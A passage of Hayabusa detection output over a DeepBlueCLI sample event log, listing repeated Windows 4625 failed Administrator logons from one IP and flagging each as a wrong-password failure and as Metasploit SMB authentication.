NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:37.669 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:37.714 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: HHqBI8bzZn5VO9gq : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:37.714 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:37.757 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Xz2ZO3b3QSh6Rdqt : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:37.757 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:37.797 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: IEfdhrwbTfCpCXKC : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:37.797 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit 
SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:37.844 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: kc0LuQzAmQTIF1X3 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:37.844 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:37.896 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: WMZ70YmzpVp2h8mY : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:37.896 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:37.945 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: FFVr3Amq6mA3umiu : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:37.945 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:37.985 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong 
Password,User: Administrator : Type: 3 : Workstation: hnN15vqZcww8pqTK : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:37.985 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:38.027 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: sSuMRF1txQ9g2Mwi : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:38.027 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:38.073 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: tUuapChhs4CGO1cS : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:38.073 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:38.119 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: dIMr0hjIkwD8AaEG : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:38.119 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:38.173 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 8ww9HMQX0cqmolYQ : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:38.173 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:38.210 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: XJRRZ5e9lARVZDar : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:38.210 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:38.260 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: VvUzVoSLqFPAXSWE : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:38.260 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit 
SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:38.304 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: SMMgPu1VJIjAWPDW : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:38.304 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:38.337 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: I1JjIa4nOKDTLuAD : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:38.337 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:38.377 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 0J0GJIm1UUXHH9QJ : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:38.377 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:38.419 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong 
Password,User: Administrator : Type: 3 : Workstation: YmVX3xIz0hrQFvPr : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:38.419 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:38.470 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: nv4tKFEmHjiXkVDI : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:38.470 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:38.500 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: esdHHJl9LBek9pIo : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:38.500 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:38.545 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: MWofwwLjwiyBk39P : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:38.545 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:38.589 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: dvsHFZe7Z1uJ9Dkv : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:38.589 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:38.629 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 8aDdgwvb1zsZF79k : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:38.629 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:38.668 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: AQUb6CnMUtyrMNhF : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:38.668 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit 
SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:38.701 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: KP5OxHPsbLHnIUBE : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:38.701 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:38.744 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Ysg903vYFhQHYvFJ : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:38.744 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:38.793 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: IySarHtsTvwSP56H : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:38.793 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:38.828 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong 
Password,User: Administrator : Type: 3 : Workstation: GnUy8tbCIAVnmhDg : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:38.828 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:38.863 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: bfBtc4MnMtPG6MpC : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:38.863 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:38.901 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 37b8MGIHY8QwXf9K : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:38.901 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:38.945 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: eDuaWikplDmJNmIE : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:38.945 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:38.989 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 0kSSoAYJILHCPI7K : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:38.989 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:39.023 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: L9ikrtTGcZYU1556 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:39.023 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:39.064 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: ypyd6SagvUXQHhtZ : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:39.064 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit 
SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:39.100 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: QWS37lIJ3Q6ghgMs : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:39.100 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:39.149 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: H211KmFImpBRwTGW : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:39.149 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:39.193 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 64tO5iBehXQcNc49 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:39.193 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:39.236 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong 
Password,User: Administrator : Type: 3 : Workstation: xvxDngRj3j5TAwST : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:39.236 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:39.281 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: O8VYRjMnxDgUTWYf : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:39.281 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:39.331 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: EhWphTesbUf0hwi1 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:39.331 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:39.385 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: MO8VRRVANxIkDzEX : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:39.385 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:39.429 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: ziSXANiDAf7LRFz5 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:39.429 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:39.527 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: g0CvYYtyEcU2riBX : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:39.527 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:39.576 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: tPg2LKgWMeM0Oqo0 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:39.576 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit 
SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:39.604 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: dbzL9T2d4RdeCz4q : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:39.604 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:39.653 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: PeEfbWpoipfYtOKv : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:39.653 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:39.685 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: RKJW1vSrIAbRTzyB : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:39.685 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:39.730 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong 
